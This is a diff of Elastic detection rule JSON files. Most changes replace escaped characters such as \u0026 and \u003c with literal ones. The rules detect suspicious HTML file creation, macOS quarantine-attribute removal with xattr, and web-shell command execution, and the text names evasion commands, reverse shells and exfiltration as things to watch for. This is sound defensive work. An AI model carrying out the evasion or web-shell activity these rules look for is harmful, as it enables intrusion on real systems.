@@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -111,7 +111,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_105.json b/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_105.json index 869e9d00cd3..76f79428db5 100644 --- a/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_105.json +++ b/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_105.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious HTML File Creation", - "query": "sequence by user.id with maxspan=5m\n [file where host.os.type == \"windows\" and event.action in (\"creation\", \"rename\") and\n file.extension : (\"htm\", \"html\") and\n file.path : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*\") and\n ((file.Ext.entropy \u003e= 5 and file.size \u003e= 150000) or file.size \u003e= 1000000)]\n [process where host.os.type == \"windows\" and event.action == \"start\" and\n (\n (process.name in (\"chrome.exe\", \"msedge.exe\", \"brave.exe\", \"whale.exe\", \"browser.exe\", \"dragon.exe\", \"vivaldi.exe\", \"opera.exe\")\n and process.args == \"--single-argument\") or\n (process.name == \"iexplore.exe\" and process.args_count == 2) or\n (process.name in (\"firefox.exe\", \"waterfox.exe\") and process.args == \"-url\")\n )\n and process.args : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*.htm*\")]\n", + "query": "sequence by user.id with maxspan=5m\n [file where host.os.type == \"windows\" and event.action in (\"creation\", \"rename\") and\n file.extension : (\"htm\", \"html\") and\n file.path : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*\") and\n ((file.Ext.entropy >= 5 and file.size >= 150000) or file.size >= 1000000)]\n [process where host.os.type == \"windows\" and event.action == \"start\" and\n (\n (process.name in (\"chrome.exe\", \"msedge.exe\", \"brave.exe\", \"whale.exe\", \"browser.exe\", \"dragon.exe\", \"vivaldi.exe\", \"opera.exe\")\n and process.args == \"--single-argument\") or\n (process.name == \"iexplore.exe\" and process.args_count == 2) or\n (process.name in (\"firefox.exe\", \"waterfox.exe\") and process.args == \"-url\")\n )\n and process.args : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*.htm*\")]\n", "related_integrations": [ { "package": "endpoint", @@ -72,7 +72,7 @@ ], "risk_score": 47, "rule_id": "f0493cb4-9b15-43a9-9359-68c23a7f2cf3", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -83,7 +83,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -110,7 +110,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_102.json b/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_102.json index 8999840f148..9e483ea6d30 100644 --- a/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_102.json +++ b/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_102.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_103.json b/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_103.json index 83875113a72..d328d40ea9a 100644 --- a/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_103.json +++ b/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_103.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_104.json b/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_104.json index 249d42a7f2f..cf989761e39 100644 --- a/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_104.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_205.json b/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_205.json index b56034f1009..0348f657069 100644 --- a/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_205.json +++ b/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_205.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_102.json b/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_102.json index 2aeee8c9e86..18f744c8fc9 100644 --- a/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_102.json +++ b/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_102.json @@ -13,7 +13,7 @@ "license": "Elastic License v2", "name": "Attempt to Remove File Quarantine Attribute", "note": "", - "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.name : \"xattr\" and\n (\n (process.args : \"com.apple.quarantine\" and process.args : (\"-d\", \"-w\")) or\n (process.args : \"-c\") or\n (process.command_line : (\"/bin/bash -c xattr -c *\", \"/bin/zsh -c xattr -c *\", \"/bin/sh -c xattr -c *\"))\n ) and not process.args_count \u003e 12\n", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.name : \"xattr\" and\n (\n (process.args : \"com.apple.quarantine\" and process.args : (\"-d\", \"-w\")) or\n (process.args : \"-c\") or\n (process.command_line : (\"/bin/bash -c xattr -c *\", \"/bin/zsh -c xattr -c *\", \"/bin/sh -c xattr -c *\"))\n ) and not process.args_count > 12\n", "references": [ "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", "https://ss64.com/osx/xattr.html" @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_103.json b/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_103.json index b692ce9faef..21a5777a1d9 100644 --- a/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_103.json +++ b/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_103.json @@ -13,7 +13,7 @@ "license": "Elastic License v2", "name": "Attempt to Remove File Quarantine Attribute", "note": "", - "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.name : \"xattr\" and\n (\n (process.args : \"com.apple.quarantine\" and process.args : (\"-d\", \"-w\")) or\n (process.args : \"-c\") or\n (process.command_line : (\"/bin/bash -c xattr -c *\", \"/bin/zsh -c xattr -c *\", \"/bin/sh -c xattr -c *\"))\n ) and not process.args_count \u003e 12\n", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.name : \"xattr\" and\n (\n (process.args : \"com.apple.quarantine\" and process.args : (\"-d\", \"-w\")) or\n (process.args : \"-c\") or\n (process.command_line : (\"/bin/bash -c xattr -c *\", \"/bin/zsh -c xattr -c *\", \"/bin/sh -c xattr -c *\"))\n ) and not process.args_count > 12\n", "references": [ "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", "https://ss64.com/osx/xattr.html" @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_104.json b/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_104.json index faf434998b1..ae37d5ba5c2 100644 --- a/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_104.json @@ -13,7 +13,7 @@ "license": "Elastic License v2", "name": "Attempt to Remove File Quarantine Attribute", "note": "", - "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.name : \"xattr\" and\n (\n (process.args : \"com.apple.quarantine\" and process.args : (\"-d\", \"-w\")) or\n (process.args : \"-c\") or\n (process.command_line : (\"/bin/bash -c xattr -c *\", \"/bin/zsh -c xattr -c *\", \"/bin/sh -c xattr -c *\"))\n ) and not process.args_count \u003e 12\n", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.name : \"xattr\" and\n (\n (process.args : \"com.apple.quarantine\" and process.args : (\"-d\", \"-w\")) or\n (process.args : \"-c\") or\n (process.command_line : (\"/bin/bash -c xattr -c *\", \"/bin/zsh -c xattr -c *\", \"/bin/sh -c xattr -c *\"))\n ) and not process.args_count > 12\n", "references": [ "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", "https://ss64.com/osx/xattr.html" @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_105.json b/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_105.json index 95415e86c87..d951da0cbb6 100644 --- a/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_105.json +++ b/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_105.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Attempt to Remove File Quarantine Attribute", - "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.name : \"xattr\" and\n (\n (process.args : \"com.apple.quarantine\" and process.args : (\"-d\", \"-w\")) or\n (process.args : \"-c\") or\n (process.command_line : (\"/bin/bash -c xattr -c *\", \"/bin/zsh -c xattr -c *\", \"/bin/sh -c xattr -c *\"))\n ) and not process.args_count \u003e 12\n", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.name : \"xattr\" and\n (\n (process.args : \"com.apple.quarantine\" and process.args : (\"-d\", \"-w\")) or\n (process.args : \"-c\") or\n (process.command_line : (\"/bin/bash -c xattr -c *\", \"/bin/zsh -c xattr -c *\", \"/bin/sh -c xattr -c *\"))\n ) and not process.args_count > 12\n", "references": [ "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", "https://ss64.com/osx/xattr.html" @@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_106.json b/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_106.json index f48e53b48a6..5781ef04cdf 100644 --- a/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_106.json +++ b/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_106.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Attempt to Remove File Quarantine Attribute", - "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.name : \"xattr\" and\n (\n (process.args : \"com.apple.quarantine\" and process.args : (\"-d\", \"-w\")) or\n (process.args : \"-c\") or\n (process.command_line : (\"/bin/bash -c xattr -c *\", \"/bin/zsh -c xattr -c *\", \"/bin/sh -c xattr -c *\"))\n ) and not process.args_count \u003e 12\n", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.name : \"xattr\" and\n (\n (process.args : \"com.apple.quarantine\" and process.args : (\"-d\", \"-w\")) or\n (process.args : \"-c\") or\n (process.command_line : (\"/bin/bash -c xattr -c *\", \"/bin/zsh -c xattr -c *\", \"/bin/sh -c xattr -c *\"))\n ) and not process.args_count > 12\n", "references": [ "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", "https://ss64.com/osx/xattr.html" @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f0bc081a-2346-4744-a6a4-81514817e888_101.json b/packages/security_detection_engine/kibana/security_rule/f0bc081a-2346-4744-a6a4-81514817e888_101.json index 40d480bec14..81ecda6ea14 100644 --- a/packages/security_detection_engine/kibana/security_rule/f0bc081a-2346-4744-a6a4-81514817e888_101.json +++ b/packages/security_detection_engine/kibana/security_rule/f0bc081a-2346-4744-a6a4-81514817e888_101.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f0bc081a-2346-4744-a6a4-81514817e888_102.json b/packages/security_detection_engine/kibana/security_rule/f0bc081a-2346-4744-a6a4-81514817e888_102.json index a868508a4d6..8853764b1c1 100644 --- a/packages/security_detection_engine/kibana/security_rule/f0bc081a-2346-4744-a6a4-81514817e888_102.json +++ b/packages/security_detection_engine/kibana/security_rule/f0bc081a-2346-4744-a6a4-81514817e888_102.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_102.json b/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_102.json index 986fa8a9851..cdf5297521f 100644 --- a/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_102.json +++ b/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_102.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_103.json b/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_103.json index 1636bd47327..bed8b78f50e 100644 --- a/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_103.json +++ b/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_103.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_104.json b/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_104.json index e5c3011c744..7e1388897fd 100644 --- a/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_104.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_105.json b/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_105.json index 32f13146c73..c8a5ba2e6f3 100644 --- a/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_105.json +++ b/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_105.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_1.json b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_1.json index 415ece7e617..f47f01e99cd 100644 --- a/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_1.json +++ b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_1.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_2.json b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_2.json index a6244d65493..5e02359a15b 100644 --- a/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_2.json +++ b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_2.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_3.json b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_3.json index 4ce741c0292..cc76b21630e 100644 --- a/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_3.json +++ b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_3.json @@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Remote Code Execution via Web Server", - "note": "## Triage and analysis\n\n### Investigating Potential Remote Code Execution via Web Server\n\nAdversaries may backdoor web servers with web shells to establish persistent access to systems. A web shell is a malicious script, often embedded into a compromised web server, that grants an attacker remote access and control over the server. This enables the execution of arbitrary commands, data exfiltration, and further exploitation of the target network.\n\nThis rule detects a web server process spawning script and command line interface programs, potentially indicating attackers executing commands using the web shell.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate abnormal behaviors by the subject process such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential reverse shells or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Investigate the process information for malicious or uncommon processes/process trees.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n - Investigate the process tree spawned from the user that is used to run the web application service. A user that is running a web application should not spawn other child processes.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info for Webapp User\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes WHERE uid = {{process.user.id}}\"}}\n- Examine the command line to determine which commands or scripts were executed.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Remote Code Execution via Web Server\n\nAdversaries may backdoor web servers with web shells to establish persistent access to systems. A web shell is a malicious script, often embedded into a compromised web server, that grants an attacker remote access and control over the server. This enables the execution of arbitrary commands, data exfiltration, and further exploitation of the target network.\n\nThis rule detects a web server process spawning script and command line interface programs, 